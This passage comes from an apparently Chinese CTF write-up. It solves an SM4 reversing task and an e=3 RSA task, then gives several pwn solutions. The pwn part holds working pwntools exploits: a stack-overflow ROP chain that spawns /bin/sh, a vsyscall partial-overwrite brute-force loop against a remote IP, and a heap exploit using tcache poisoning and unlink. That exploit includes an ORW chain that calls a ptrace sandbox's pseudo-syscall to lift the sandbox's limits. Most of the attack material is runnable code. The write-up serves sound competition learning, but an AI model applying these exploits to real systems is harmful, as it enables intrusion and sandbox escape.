        var t = bigxor(bigxor(K[i + 1], K[i + 2]), bigxor(K[i + 3], CK[i]));
        K.push(bigxor(K[i], PUT_ULONG_BE(t)));
        rk.push(K[i + 4].toString(16));
    }
    return rk;
}

/**
 * Encrypt ONE 128-bit block with SM4.
 *
 * @param messsage  the block as four 32-bit words X0..X3. The array is
 *                  extended in place: X4..X35 are written into the caller's
 *                  array as a side effect.
 * @param key       master key, four 32-bit words.
 * @param method    NOT USED. There is no IV and no chaining here despite the
 *                  "cbc" default: each call is an independent raw block
 *                  (i.e. ECB), so equal plaintext blocks give equal
 *                  ciphertext blocks.
 * @return          [X35, X34, X33, X32] as hex strings (reverse-order output
 *                  per the spec's R transform; negative int32 -> "-…").
 */
function KJUR_encrypt_sm4(messsage, key, method = "cbc") {
    var X = messsage;
    var rk = sm4_getkey(key);
    for (var i = 0; i < 32; i++) {
        var t = bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)));
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(t));
    }
    var Y = [];
    for (var j = 35; j >= 32; j--) {
        Y.push(X[j].toString(16));
    }
    return Y;
}

/**
 * Decrypt ONE 128-bit block with SM4: identical to encryption except the
 * round keys are consumed in reverse order.
 *
 * @param ciphertext  four 32-bit words; extended in place (X4..X35 written).
 * @param key         master key, four 32-bit words.
 * @param method      NOT USED — single raw block, no IV, no chaining.
 * @return            [X35, X34, X33, X32] as hex strings (see encrypt).
 */
function KJUR_decrypt_sm4(ciphertext, key, method = "cbc") {
    var X = ciphertext;
    var rk = sm4_getkey(key).reverse();
    for (var i = 0; i < 32; i++) {
        var t = bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)));
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(t));
    }
    var Y = [];
    for (var j = 35; j >= 32; j--) {
        Y.push(X[j].toString(16));
    }
    return Y;
}

// Solve script: the three ciphertext blocks are the `ans` constants and `key`
// is the `key` constant from the snapshot bytecode dumped above
// (0x01234567 0x89abcdef 0xfedcba98 0x76543210 — the worked-example key of
// the SM4 spec). Each block is decrypted independently (no chaining).
// Note: these are assigned without `var`, as implicit globals, like the
// original.
ciphertext = [1605062385, -642825121, 2061445208, 1405610911];
ciphertext2 = [1713399267, 1396669315, 1081797168, 605181189];
ciphertext3 = [1824766525, 1196148725, 763423307, 1125925868];
key = [19088743, 2309737967, 4275878552, 1985229328];

[ciphertext, ciphertext2, ciphertext3].forEach(function (block) {
    console.log(KJUR_decrypt_sm4(block, key));
});

rocket

下了个断点,找到启动 rocket 的命令,发现它是从当前 bin 中加载代码;在对应位置搜索 “Input”,发现附近有一段很长的 hex 数据(模数 n),再结合输出的内容都是 x^3,猜测是 e = 3 的 RSA。由于 e 很小,只要 m^3 比 n 大得不多(即 m^3 = c + k·n 中 k 较小),枚举 k 对 c + k·n 开立方就能直接恢复明文,不需要分解 n;使用如下脚本进行解密(e = 3 小明文攻击):

import gmpy2
import time
from Crypto.Util.number import long_to_bytes

n = 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
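e = 3
res = 0
c = 7212272804013543391008421832457418223544765489764042171135982569211377620290274828526744558976950004052088838419495093523281490171119109149692343753662521483209758621522737222024221994157092624427343057143179489608942837157528031299236230089474932932551406181


def _iroot(x, k):
    """Integer k-th root of x >= 0.

    Returns (r, exact) with r = floor(x ** (1/k)) and exact = (r ** k == x),
    the same contract as gmpy2.iroot, but in pure ints (no floats, so no
    precision loss on 1000-bit values). Newton's iteration is started from a
    power of two that is >= the root, so it decreases monotonically and the
    first non-decreasing step is the floor.
    """
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)
    while True:
        nr = ((k - 1) * r + x // r ** (k - 1)) // k
        if nr >= r:
            break
        r = nr
    return r, r ** k == x


def small_e_root(c, n, e=3, max_k=200000000):
    """Low-public-exponent ("small message") RSA attack.

    When e is tiny and m**e is only slightly larger than n, the ciphertext
    satisfies m**e == c + k*n for a small k. Walk k upward and return the first
    (k, m) for which c + k*n is a perfect e-th power. Returns None if no k
    below max_k works — then the attack simply does not apply to this (c, n).
    The root is computed once per k (the original called iroot twice).
    """
    for k in range(max_k):
        root, exact = _iroot(c + n * k, e)
        if exact:
            return k, root
    return None


if __name__ == "__main__":
    # `n` is the modulus pulled out of the binary (assigned above).
    found = small_e_root(c, n, e)
    if found is not None:
        k, res = found
        print(k, res)
        # equivalent of Crypto.Util.number.long_to_bytes(res)
        print(res.to_bytes((res.bit_length() + 7) // 8, "big"))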

PWN

protocol

静态编译的二进制,存在栈溢出;没有 libc 可泄漏,但程序自身 gadget 充足,直接 ret2syscall(先 read 把 "/bin/sh" 写进 .bss,再 execve)即可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import ctf_pb2
context.log_level = 'debug'

# Target is a statically linked binary (see the gadget addresses below, all
# inside the executable). Remote when called as `script host port`, local
# otherwise.
binary = 'protocol'
elf = ELF('protocol')
libc = elf.libc
context.binary = binary
if(len(sys.argv) == 3):
    sh = remote(sys.argv[1],sys.argv[2])
else:
    sh = process(binary)
# Generic pwntools shorthands from a template; none of them is used by this
# exploit (only new_ctf/send_payload below are).
# NOTE(review): the page renders the escapes with doubled backslashes
# ("\\x7f"); the intended literals are the single bytes 0x7f / 0x00 / 0xf7.
l64 = lambda      :u64(sh.recvuntil("\\x7f")[-6:].ljust(8,"\\x00"))
l32 = lambda      :u32(sh.recvuntil("\\xf7")[-4:].ljust(4,"\\x00"))
sla = lambda a,b  :sh.sendlineafter(str(a),str(b))
sa  = lambda a,b  :sh.sendafter(str(a),str(b))
lg  = lambda name,data : sh.success(name + ": 0x%x" % data)
se  = lambda payload: sh.send(payload)
rl  = lambda      : sh.recv()
sl  = lambda payload: sh.sendline(payload)
ru  = lambda a     :sh.recvuntil(str(a))
def new_ctf(username = b"admin",password = b"admin"):
    """Send one protobuf `pwn` login message after the "Login: " prompt.

    `username` is the overflowing field (see send_payload); `password` is
    just filler the server also copies. Defaults produce a harmless login,
    which the exploit uses as the final message that makes the server return
    into the chain.
    """
    msg = ctf_pb2.pwn()
    msg.username, msg.password = username, password
    sh.sendafter(b"Login: ", msg.SerializeToString())
def send_payload(offset,payload):
    """Write one 8-byte stack slot at `offset` past the saved-return area.

    The username lands 0x148 bytes below the slot and, from what the write
    pattern shows, the copy appends a single NUL after the data (strcpy-like).
    A slot therefore cannot be written in one go — any zero byte would end the
    copy — so each zero is produced by a separate, one-byte-shorter login whose
    terminating NUL lands exactly where the zero belongs. Writes must be done
    from the highest offset downward: every login refills everything below
    `offset` with 'a'.
    Stack layout achieved per branch (little-endian, 8 bytes from `offset`):
      payload == 0           -> 00 00 00 00 00 00 00 00
      0 < payload < 0xff     -> xx 00 00 00 00 00 00 00
      offset == 0            -> b0 b1 b2 00 (upper 4 bytes left as they are;
                                the caller zeroes slot 0 first)
      otherwise (address)    -> b0 b1 b2 00 00 00 00 00  (3 significant bytes,
                                enough for this non-PIE static binary)
    """
    if (payload) == 0:
        # new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x8,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif payload < 0xff and payload > 0:
        print("aaa")
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        # the value byte itself, its trailing NUL fills offset+1
        new_ctf(b"a"*0x148 + offset*b'a' + p8(payload),b"c"*0x100)
        # new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif offset == 0:
        print("bbbb")
        new_ctf(b"a"*0x148+p32(payload)[:3],b"c"*0x100)
    else:
    # new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3],b"c"*0x100)
# ROP gadgets inside the static binary (no ASLR on them, non-PIE).
pop_rdi = 0x0000000000404982
pop_rsi = 0x0000000000588bbe
pop_rdx = 0x000000000040454f
pop_rax = 0x00000000005bdb8a
syscall = 0x000000000068f0a4
pop_rsp = 0x00000000005a350a   # unused
# 0x81a2a0+0x400: scratch address in the writable image (.bss); the chain
# assumes it is zero-filled so the 7-byte "/bin/sh" ends up NUL-terminated.

# Assemble the chain one 8-byte slot at a time, highest offset first (each
# send_payload overwrites everything below it). Read bottom-up, the stack is:
#   0x00 pop_rdi ; 0x08 0        \
#   0x10 pop_rsi ; 0x18 buf       |  read(0, buf, 7)  <- receives "/bin/sh"
#   0x20 pop_rdx ; 0x28 7         |  typed into interactive() below
#   0x30 pop_rax ; 0x38 0 (read)  |
#   0x40 syscall                  /
#   0x48 pop_rdi ; 0x50 buf       \
#   0x58 pop_rsi ; 0x60 0         |  execve(buf, NULL, NULL)
#   0x68 pop_rdx ; 0x70 0         |
#   0x78 pop_rax ; 0x80 0x3b      |
#   0x88 syscall                  /
# attach(sh)
send_payload(0x88,syscall)
send_payload(0x80,0x3b)
send_payload(0x78,pop_rax)
send_payload(0x70,0)
send_payload(0x68,pop_rdx)
send_payload(0x60,0)
send_payload(0x58,pop_rsi)
send_payload(0x50,0x81a2a0+0x400)
send_payload(0x48,pop_rdi)
send_payload(0x40,syscall)
send_payload(0x38,0)
send_payload(0x30,pop_rax)
send_payload(0x28,0x7)
send_payload(0x20,pop_rdx)
send_payload(0x18,0x81a2a0+0x400)
send_payload(0x10,pop_rsi)
send_payload(0x8,0)
# slot 0: zero all 8 bytes first, then lay the 3 address bytes over them
# (the offset==0 branch of send_payload only writes 3 bytes + NUL).
send_payload(0,0)
send_payload(0,pop_rdi)
# A short, harmless login makes the server return -> chain starts. Type
# "/bin/sh" (exactly 7 bytes) once interactive.
new_ctf()
sh.interactive()
"""
p = p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x00000000005bdb8a) # pop rax ; ret
p += b'/bin/sh;'
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000404982) # pop rdi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x000000000040454f) # pop rdx ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x0000000000403c99) # syscall
"""

unexploitable

栈溢出:先用 vsyscall 页(不是 vDSO,地址固定)中 time() 入口 0xffffffffff600400 填返回地址,内核模拟执行后会直接返回到栈上的下一个槽,相当于 ret gadget;再对随后栈上的 libc 地址做 3 字节部分覆盖改成 one_gadget。libc 基址页对齐,地址低 12 位固定,3 字节覆盖只需要猜中间 12 位,成功率 1/4096,循环爆破即可(依赖内核以 emulate 模式提供 vsyscall)

from pwn import *
#context.log_level = "debug"
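context.timeout = 10

# Brute force a 3-byte partial overwrite. libc is page-aligned, so the low
# 12 bits of any libc address are fixed; the overwrite only has to guess the
# 12 bits above them -> 1 hit in 4096. Each attempt is a fresh connection, so
# a wrong guess just crashes that remote process.
while(1):
    sh = None
    try:
        sh = remote('47.95.3.91', 41632)
        # 0x18 bytes of filler, then two slots of the vsyscall time() entry
        # (0xffffffffff600400 — fixed address, behaves like `ret` when the
        # kernel emulates vsyscall), then the 3 low bytes of the one_gadget
        # over the libc pointer already sitting in the next slot.
        # NOTE(review): the page shows doubled backslashes; the intended
        # literal is the raw bytes 02 c3 4f.
        sh.send('a' * 0x18 + p64(0xffffffffff600400) * 2 + '\\x02\\xc3\\x4f')
        sleep(0.1)
        for i in range(3):
            sh.sendline("cat flag")
            sleep(0.1)
            # sh.interactive()
        data = sh.recv()
        print(data)
        if "flag" in data:
            break
    except Exception as e:
        # Wrong guess / refused connection / timeout -> retry. `sh` is reset
        # per attempt, so a failed remote() never closes an unbound or stale
        # handle (the original called sh.close() unconditionally).
        print(e)
        if sh is not None:
            sh.close()
sh.interactive()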

sandboxheap

菜单题外面套了一层用 ptrace 实现的 syscall 沙箱(类似 strace:父进程 fork 后用 PTRACE_SYSCALL 逐个拦截子进程的 syscall,按表决定放行还是改成 -1)

/*
 * Tracer half of the sandbox (IDA pseudo-C). Forks, runs the real challenge
 * binary as a ptrace-d child and stops it at every syscall entry and exit.
 * Policy is the byte table regs_map filled by set_map(): 1 = block, 0 = allow.
 * A blocked syscall is neutralised by rewriting orig_rax to -1 on entry, so
 * the kernel executes nothing; on exit the tracer pokes a return value in.
 *
 * Two tracee-controlled knobs:
 *   - syscall 0x25 (alarm) calls set_map(1) as a side effect (alarm itself is
 *     then blocked like everything else once the table is populated);
 *   - the pseudo syscall number 0x2710 calls set_map(rdi), i.e. the tracee can
 *     choose its own policy bits — rdi = 3 opens open + read/write. This is
 *     exactly what the ROP chain further down uses.
 * Until set_map() has run once, regs_map is untouched .bss (all zero), so
 * nothing is filtered before the first alarm().
 *
 * NOTE(review): only numbers <= 0x2710 are looked up; anything larger goes to
 * the kernel untouched. On kernels exposing the x32 ABI, 0x40000000|nr would
 * therefore skip the table — not needed here since 0x2710 hands the bits out.
 */
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  __pid_t v3; // eax
  unsigned int v4; // ebx
  unsigned __int64 orig_rax; // rax
  int *v6; // rax
  char *v7; // rax
  struct user_regs_struct regs; // [rsp+0h] [rbp-108h] BYREF
  unsigned __int64 v9; // [rsp+D8h] [rbp-30h]

  v9 = __readfsqword(0x28u);
  if ( a1 <= 1 )
  {
    __fprintf_chk(stderr, 1LL, "strace: too few arguments: %d", (unsigned int)a1);
  }
  else
  {
    v3 = fork();
    v4 = v3;
    if ( v3 != -1 )
    {
      if ( v3 )
      {
        // Parent: wait for the child's TRACEME/execvp stop, then
        // 0x100000 == PTRACE_O_EXITKILL: the child dies with the tracer.
        waitpid(v3, 0LL, 0);
        ptrace(PTRACE_SETOPTIONS, v4, 0LL, 0x100000LL);
        do
        {
          // syscall-entry stop
          if ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) == -1
            || waitpid(v4, 0LL, 0) == -1
            || ptrace(PTRACE_GETREGS, v4, 0LL, &regs) == -1 )
          {
            break;
          }
          if ( regs.orig_rax == 0x25 )          // alarm(37): tracee gets the I/O bits for free
            set_map(1);
          orig_rax = regs.orig_rax;
          // Deny-list lookup on the low 32 bits (index is bounded 0..0x2710).
          if ( LODWORD(regs.orig_rax) <= 0x2710 && regs_map[SLODWORD(regs.orig_rax)] )
          {
            regs.orig_rax = -1LL;               // -1 -> kernel runs no syscall
            if ( ptrace(PTRACE_SETREGS, v4, 0LL, &regs) == -1 )
              break;
            orig_rax = regs.orig_rax;           // blocked calls never reach the switch
          }
          switch ( orig_rax )
          {
            case 0xE7uLL:                       // exit_group: tracer exits with the same code
              goto LABEL_24;
            case 0x2710uLL:                     // pseudo syscall: tracee picks its policy bits
              set_map(regs.rdi);
              break;
            case 0x3CuLL:                       // exit
LABEL_24:
              exit(regs.rdi);
          }
        }
        // syscall-exit stop; for the pseudo syscall or a blocked one, poke the
        // return register (offset 0x50 in user_regs_struct is rax). The 4th
        // (data) argument is missing in this listing, so the value written is
        // not visible here.
        while ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) != -1
             && waitpid(v4, 0LL, 0) != -1
             && (regs.orig_rax != 10000 && regs.orig_rax != -1LL || ptrace(PTRACE_POKEUSER, v4, 0x50LL) != -1) );
      }
      else
      {
        // Child: request tracing, then exec the real binary (argv[1..]).
        ptrace(PTRACE_TRACEME, 0LL, 0LL, 0LL);
        execvp(a2[1], a2 + 1);
      }
    }
    v6 = __errno_location();
    v7 = strerror(*v6);
    __fprintf_chk(stderr, 1LL, "strace: %s", v7);
  }
  fputc(10, stderr);
  exit(1);
}

set_map 初始化 regs_map 这张 syscall 表:先把整张表置 1(拦截,上面的循环会把这类调用的 orig_rax 改成 -1),再把允许的 syscall 号置 0;参数的 bit0 放开 read/write 一族,bit1 放开 open

/*
 * Rebuild the syscall policy table consulted by the tracer loop in main().
 *
 * regs_map[nr] == 1 means "block" (orig_rax is rewritten to -1), 0 means
 * "allow". The whole table is blocked first, then a fixed allow-list is
 * opened, then the two low bits of a1 open more:
 *   bit 0 - the read/write family (plain, positional, vectored, sendfile)
 *   bit 1 - open
 * Called with a1 = 1 when the tracee issues alarm(), and with a1 = rdi when
 * it issues the pseudo syscall 0x2710.
 */
void __fastcall set_map(char a1)
{
  static const int base_allow[] = {
    3,                  // close
    9, 10, 11, 12,      // mmap, mprotect, munmap, brk
    60,                 // exit
    231,                // exit_group
  };
  static const int io_allow[] = {
    0, 1,               // read, write
    17, 18, 19, 20,     // pread64, pwrite64, readv, writev
    40,                 // sendfile
    295, 296,           // preadv, pwritev
  };
  unsigned int i;

  memset(regs_map, 1, 0x2711uLL);               // block everything, 0..0x2710 inclusive
  for ( i = 0; i < sizeof(base_allow) / sizeof(base_allow[0]); i++ )
    regs_map[base_allow[i]] = 0;
  if ( (a1 & 1) != 0 )
  {
    for ( i = 0; i < sizeof(io_allow) / sizeof(io_allow[0]); i++ )
      regs_map[io_allow[i]] = 0;
    // This byte sits right after a 0x2710-byte table, so it is most likely
    // regs_map[0x2710]: clearing it is what lets the 0x2710 pseudo syscall
    // through the filter (the memset above covers 0x2711 bytes). Unverified.
    byte_204750 = 0;
  }
  if ( (a1 & 2) != 0 )
    regs_map[2] = 0;                            // open
}

堆菜单部分拿到 ROP 之后,先执行 syscall(0x2710, rdi=3):这个假 syscall 号会让 tracer 调用 set_map(3),放开 open 和 read/write;之后正常 ORW 读 flag 即可。堆部分的做法与 *bitheap* 一题相同

from pwn import *

context.log_level = "debug"
context.arch = "amd64"
# Locally the binary is run under the ptrace sandbox wrapper; the remote
# service already does that for us.
#sh = process(['./sandbox', './sandboxheap'])
sh = remote('39.106.13.71', 15670)
#sh = process(['./sandboxheap'])

def choice(idx):
    """Answer the main menu prompt with option number `idx`."""
    prompt = "choice: "
    sh.sendlineafter(prompt, str(idx))

def add(idx, size):
    """Menu 1: allocate a chunk of `size` bytes into slot `idx`."""
    choice(1)
    for prompt, value in (("Index: ", idx), ("Size: ", size)):
        sh.sendlineafter(prompt, str(value))

def edit(idx, content, tag=False):
    """Menu 2: write `content` into slot `idx`, one bit at a time.

    The program consumes ASCII '0'/'1' characters, least-significant bit of
    each byte first (hence the reversal). With `tag` one extra '0' bit is
    appended past the end of `content`; the exploit uses that single bit to
    clear the low bit of whatever byte follows the chunk data (the next
    chunk's PREV_INUSE flag).
    """
    choice(2)
    sh.sendlineafter("Index: ", str(idx))

    bits = []
    for ch in content:
        byte_bits = bin(u8(ch))[2:].rjust(8, '0')
        bits.append(byte_bits[::-1])
    payload = "".join(bits)
    if tag:
        payload += '0'
    sh.sendafter("Content: ", payload)

def show(idx):
    """Menu 3: print the contents of slot `idx` (caller parses the output)."""
    choice(3)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))

def delete(idx):
    """Menu 4: free slot `idx` (the pointer is evidently kept — see the UAF use below)."""
    choice(4)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))

# --- heap leak -----------------------------------------------------------
# Two 0x90 chunks (A = slot 0, B = slot 1) plus seven more to be able to fill
# the tcache bin later.
add(0, 0x88)
add(1, 0x88)

for i in range(2, 2 + 7):
    add(i, 0x88)

# Free A then B (both to tcache), take them back in LIFO order so the slots
# keep their original memory; B's data still holds its tcache `next` = A,
# which show() prints. A's data sits 0x260 into the heap.
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))

# --- libc leak via forward consolidation --------------------------------
# Make B look like a free chunk that passes unlink():
#   fake_chunk = B's own header; the only pointer to it lives inside B's data
#   (+0x10, i.e. fake_ptr), and fd/bk are chosen so that fd->bk and bk->fd
#   both read that word.  Data+0x80 is the next chunk's prev_size (0x90) and
#   the extra bit from tag=True clears its PREV_INUSE.
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
# Fill the 0x90 tcache bin (7 entries) so the next free goes to the allocator
# proper ...
for i in range(2, 2 + 7):
    delete(i)

# ... freeing A then sees "next chunk B is free" and merges A+B into the
# unsorted bin (unlink on our fake B succeeds).
delete(0)

# Drain tcache again, then the 0x88 request is carved from the merged chunk:
# A is returned and the 0x90 remainder (= B) goes back to unsorted with
# main_arena pointers written into B's data. Slot 1 still points at B -> leak.
# 0x3ebca0 is the unsorted-bin head in this libc (glibc 2.27 offsets below).
for i in range(2, 2 + 7):
    add(i, 0x88)

add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))

# libc gadgets and symbols, rebased. Offsets are for the remote glibc
# (2.27-era: __free_hook at 0x3ed8e8, environ at 0x3ee098).
def _in_libc(offset):
    """Absolute address of `offset` in the leaked libc mapping."""
    return libc_base + offset

pop_rdi_addr = _in_libc(0x2164f)
pop_rsi_addr = _in_libc(0x23a6a)
pop_rdx_addr = _in_libc(0x1b96)
pop_rax_addr = _in_libc(0x1b500)
syscall_addr = _in_libc(0xd2625)
free_hook_addr = _in_libc(0x3ed8e8)   # unused: the sandbox blocks execve anyway
environ = _in_libc(0x3ee098)          # leaked below to find the stack
gets_addr = _in_libc(0x80060)         # unused

# --- stack leak ----------------------------------------------------------
# Slot 9 takes the free remainder B (now aliased with slot 1). Free A and B
# into tcache, then use slot 1's stale pointer to poison B's `next` with
# &environ; the second allocation after that returns environ itself.
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
# environ points at the envp array; 0x110 below it is where the exploit
# targets the return address (offset found in the debugger).
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x110
log.success("stack:\\t" + hex(stack))

# --- tcache poisoning onto the stack ------------------------------------
# Same trick again, this time pointing B's `next` 0x18 below the return
# address so the next-but-one allocation (slot 2) lands on the stack.
delete(2)
delete(9)
edit(1, p64(stack - 0x18))

add(9, 0x88)
add(2, 0x88)
# Slot 2 now writes directly onto the stack: "flag\0" at start_addr, and the
# return address (start_addr + 0x18 == stack) is overwritten by rop_chain1.
start_addr = stack - 0x18
# Stage 1: read(0, stack, 0x200) — pulls the real chain in over the return
# address area. No `pop rax` here: it relies on rax already being 0
# (SYS_read) when the function returns; see the debugger note below.
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])

# Stage 2: first talk to the sandbox, then ORW the flag.
rop_chain2 = flat([
    # syscall 0x2710 with rdi = 3 -> tracer runs set_map(3): opens `open`
    # (bit 1) and the read/write family (bit 0).
    pop_rdi_addr,
    3,
    pop_rax_addr,
    0x2710,
    syscall_addr,

    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr,  # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,             # first free fd after stdin/stdout/stderr
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr,  # sys_write(1, heap, 0x100); rdx still 0x100 from the read
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])

#gdb.attach(sh, "b *$rebase(0x0000000000000E63)")
edit(2, 'flag'.ljust(0x18, '\\x00') + rop_chain1)
# Stage 1's read() lands at `stack`, i.e. on top of the chain currently
# executing; 0x10 `ret`s (pop_rdi+1) skid over the already-consumed slots.
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)

sh.interactive()

queue

菜单选项 666 是后门,可以直接改写 queue 节点结构体(数据指针、大小等字段);借此把数据指针指向任意地址就有了任意读写:先 leak libc,再把 __free_hook 改成 system,最后 pop 释放内容为 /bin/sh 的节点触发

from pwn import *

context.log_level = "debug"
# libc offsets further down (unsorted bin 0x3ebca0, __free_hook 0x3ed8e8)
# are glibc 2.27; the remote is assumed to run that.
#sh = process('./queue')
sh = remote('101.201.71.136', 12507)

def choice(idx):
    """Answer the "Queue Management: " menu prompt with option `idx`."""
    menu_prompt = "Queue Management: "
